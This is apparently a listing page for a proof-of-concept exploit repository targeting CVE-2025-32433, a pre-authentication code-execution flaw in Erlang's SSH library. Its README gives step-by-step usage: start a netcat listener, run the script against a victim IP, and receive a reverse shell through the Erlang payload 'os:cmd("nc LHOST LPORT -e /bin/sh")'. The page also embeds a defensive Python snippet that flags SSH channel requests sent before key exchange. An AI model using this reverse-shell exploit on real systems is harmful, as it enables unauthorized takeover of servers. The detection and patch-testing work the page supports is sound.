Related vulnerability
Description
A proof-of-concept exploit for CVE-2025-32433, a critical vulnerability in Erlang's SSH library that allows pre-authenticated code execution via malformed SSH_MSG_CHANNEL_REQUEST packets.
Introduction
# CVE-2025-32433 Erlang SSH Library Exploit
A proof-of-concept exploit for **CVE-2025-32433**, a critical vulnerability in Erlang's SSH library that allows pre-authenticated code execution via malformed `SSH_MSG_CHANNEL_REQUEST` packets.
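
For detection, the pre-authentication property described above can be checked on the wire. The following is an added example, not part of this repository or either author's code: it walks the cleartext SSH binary packets a client sends before `SSH_MSG_NEWKEYS` and reports any connection-protocol message such as `SSH_MSG_CHANNEL_REQUEST`. That the channel messages are visible in cleartext is an assumption, and `frame`, `preauth_connection_msgs` and the sample streams are constructed for illustration.

```python
import struct

SSH_MSG_NEWKEYS = 21
CONNECTION_MSGS = range(80, 128)  # RFC 4250 connection-protocol numbers (90 = CHANNEL_OPEN, 98 = CHANNEL_REQUEST)
MAX_PACKET = 35000                # sanity bound taken from RFC 4253 section 6.1


def frame(msg_type: int, body: bytes = b"") -> bytes:
    """Build one cleartext SSH binary packet (RFC 4253 section 6); used only for the samples."""
    payload = bytes([msg_type]) + body
    pad = 8 - (5 + len(payload)) % 8
    if pad < 4:
        pad += 8
    return struct.pack(">IB", 1 + len(payload) + pad, pad) + payload + bytes(pad)


def preauth_connection_msgs(client_stream: bytes) -> list[int]:
    """Connection-protocol message numbers a client sent in cleartext, before NEWKEYS."""
    banner_end = client_stream.find(b"\n")
    if not client_stream.startswith(b"SSH-") or banner_end < 0:
        return []
    pos, hits = banner_end + 1, []
    while pos + 6 <= len(client_stream):
        length, pad = struct.unpack_from(">IB", client_stream, pos)
        if not pad + 2 <= length <= MAX_PACKET or pos + 4 + length > len(client_stream):
            break                      # malformed or truncated framing: stop parsing
        msg = client_stream[pos + 5]
        if msg == SSH_MSG_NEWKEYS:
            break                      # everything after NEWKEYS is encrypted
        if msg in CONNECTION_MSGS:
            hits.append(msg)           # channel traffic before key exchange finished
        pos += 4 + length
    return hits


# Constructed samples: placeholder bodies, not real KEXINIT or channel contents.
BANNER = b"SSH-2.0-constructed_client\r\n"
NORMAL = BANNER + frame(20, bytes(16)) + frame(21)
SUSPICIOUS = BANNER + frame(20, bytes(16)) + frame(90, b"placeholder") + frame(98, b"placeholder")

if __name__ == "__main__":
    for name, stream in (("normal", NORMAL), ("suspicious", SUSPICIOUS)):
        print(name, preauth_connection_msgs(stream))
```

A compliant client sends connection-protocol messages only after key exchange and authentication, so any hit on a reassembled client-to-server stream is worth an alert regardless of the server implementation.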
---
## Features
- **Original exploit** by Matthew Keeley
- **Updated version** by Tyler Ramsbey:
  - Command-line arguments for **LHOST**, **LPORT**, **RHOST**, and **RPORT**
  - Built-in help and usage via `argparse`
  - Erlang-style reverse shell payload using `os:cmd("nc LHOST LPORT -e /bin/sh").`
  - Clean function decomposition and status logging for each stage
---
## Prerequisites
- **Python 3**
- A working `nc` (Netcat) listener on your attack machine
- Network access to the target SSH service (default port `22`)
---
## Usage
1. **Start your listener** on the attack box:
   ```sh
   nc -lvnp 4444
   ```
2. **Run the exploit**:
   ```sh
   python3 CVE-2025-32433.py -lh [Attacker-IP] -lp [Attacker-Port] -rh [Victim-IP] -rp [Victim-Port]
   ```
3. **Wait for the shell** to connect back to your listener.
### Help Menu
```sh
$ python3 CVE-2025-32433.py -h
usage: CVE-2025-32433.py [-h] -lh LHOST -lp LPORT [-rh RHOST] [-rp RPORT]

Send a pre-auth SSH channel request with an Erlang RCE payload
to get a reverse shell

optional arguments:
  -h, --help            show this help message and exit
  -lh LHOST, --lhost LHOST
                        Local host/IP to receive the reverse shell
  -lp LPORT, --lport LPORT
                        Local port to receive the reverse shell
  -rh RHOST, --rhost RHOST
                        Target SSH server IP (default: 10.10.248.101)
  -rp RPORT, --rport RPORT
                        Target SSH server port (default: 22)
```
---
## Credits
- **Original script** by Matthew Keeley ([MattKeeley](https://github.com/MattKeeley))
- **This updated version** by Tyler Ramsbey
---
## Disclaimer
Use this code only on systems you own or have explicit permission to test. Unauthorized exploitation of vulnerabilities is illegal and unethical.
File snapshot
[4.0K] /data/pocs/9e953763abdbe7fc368f093ac710e536acc566a1
├── [4.1K] CVE-2025-3243.py
└── [2.0K] README.md
0 directories, 2 files